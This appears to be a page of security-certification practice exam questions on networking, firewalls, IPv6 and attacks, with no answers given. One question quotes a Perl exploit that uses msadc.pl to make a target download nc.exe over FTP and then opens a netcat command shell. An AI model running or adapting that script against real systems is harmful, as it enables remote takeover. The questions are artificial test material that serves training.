Black Friday Sale Special - Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: sntaclus

Which of the following NETSH commands for interface Internet protocol version 4 (IPv4) is used to delete a DNS server or all DNS servers from a list of DNS servers for a specified interface or for all interfaces?

A.

disable dnsserver

B.

alter dnsserver

C.

delete dnsserver

D.

remove dnsserver

Which of the following statements are true about an IPv6 network?

Each correct answer represents a complete solution. Choose all that apply.

A.

For interoperability, IPv4 addresses use the last 32 bits of IPv6 addresses.

B.

It increases the number of available IP addresses.

C.

It provides improved authentication and security.

D.

It uses 128-bit addresses.

E.

It uses longer subnet masks than those used in IPv4.

Which of the following forensic tool suite is developed for Linux operating system?

A.

Wetstone

B.

MForensicsLab

C.

ProDiscover

D.

S.M.A.R.T.

Which of the following ports is used by Layer 2 Tunneling Protocol (L2TP)?

A.

UDP port 1701

B.

UDP port 67

C.

TCP port 23

D.

TCP port 25

You work as a Network Administrator for Tech Perfect Inc. The office network is configured as an IPv6 network. You have to configure a computer with the IPv6 address, which is equivalent to an IPv4 publicly routable address. Which of the following types of addresses will you choose?

A.

Site-local

B.

Global unicast

C.

Local-link

D.

Loopback

Which of the following are the two sub-layers present in Data Link layer of the OSI Reference model?

A.

Data control and Media Access control

B.

Logical control and Link control

C.

Logical Link control and Media Access control

D.

Machine Link control and Logical Link control

Which of the following can be applied as countermeasures against DDoS attacks?

Each correct answer represents a complete solution. Choose all that apply.

A.

Limiting the amount of network bandwidth

B.

Blocking IP address

C.

Using LM hashes for passwords

D.

Using Intrusion detection systems

E.

Using the network-ingress filtering

Which of the following firewalls depends on the three-way handshake of the TCP protocol?

A.

Stateful firewall

B.

Endian firewall

C.

Proxy-based firewall

D.

Packet filter firewall

Which of the following statements is true about ICMP packets?

Each correct answer represents a complete solution. Choose all that apply.

A.

The PING utility uses them to verify connectivity between two hosts.

B.

They guarantee the delivery of datagrams.

C.

They are encapsulated within IP datagrams.

D.

They use UDP datagrams.

E.

They are used to report errors if a problem in IP processing occurs.

You work as a Network Administrator for Infonet Inc. The company has a Windows Server 2008 domainbased network. The network has three Windows Server 2008 member servers and 150 Windows Vista client computers. According to the company's security policy, you apply Windows firewall setting to the computers on the network. Now, you are troubleshooting a connectivity problem that might be caused by Windows firewall. What will you do to identify connections that Windows firewall allows or blocks?

A.

Configure Internet Protocol Security (IPSec).

B.

Disable Windows firewall logging.

C.

Enable Windows firewall logging.

D.

Configure Network address translation (NAT).

You work as a desktop administrator for BlueSkwer.com. You are logged on to a Windows 7 computer with administrator rights. You have run the 'netsh interface IPv6 show interface' command which displays the following:

What is the first interface index used for?

A.

6to4 tunneling

B.

MAC address

C.

Intra-Site Automatic Tunnel Addressing Protocol

D.

Loopback

What is the size of a subnet in IPv6?

A.

264 addresses

B.

232 addresses

C.

262 addresses

D.

2128 addresses

Adam, a malicious hacker performs an exploit, which is given below:

#################################################################

$port = 53;

# Spawn cmd.exe on port X

$your = "192.168.1.1";# Your FTP Server 89

$user = "Anonymous";# login as

$pass = 'noone@nowhere.com';# password

#################################################################

$host = $ARGV[0];

print "Starting ...\n";

print "Server will download the file nc.exe from $your FTP server.\n"; system("perl msadc.pl -h

$host -C \"echo

open $your >sasfile\""); system("perl msadc.pl -h $host -C \"echo $user>>sasfile\""); system

("perl msadc.pl -h

$host -C \"echo $pass>>sasfile\""); system("perl msadc.pl -h $host -C \"echo bin>>sasfile\"");

system("perl

msadc.pl -h $host -C \"echo get nc.exe>>sasfile\""); system("perl msadc.pl -h $host -C \"echo get

hacked.

html>>sasfile\""); system("perl msadc.pl -h $host -C \"echo quit>>sasfile\""); print "Server is

downloading ...

\n";

system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\""); print "Press ENTER when download is

finished ...

(Have a ftp server)\n";

$o=; print "Opening ...\n";

system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); print "Done.\n";

#system("telnet $host $port"); exit(0);

Which of the following is the expected result of the above exploit?

A.

Opens up a SMTP server that requires no username or password

B.

Creates a share called "sasfile" on the target system

C.

Creates an FTP server with write permissions enabled

D.

Opens up a telnet listener that requires no username or password

Which of the following snort keywords is used to match a defined payload value?

A.

content

B.

ttl

C.

id

D.

msg

In which of the following attacks does a hacker imitate a DNS server and obtain the entire DNS database?

A.

DNS poisoning attack

B.

Illicit zone transfer attack

C.

Illicit poisoning attack

D.

DNS transfer attack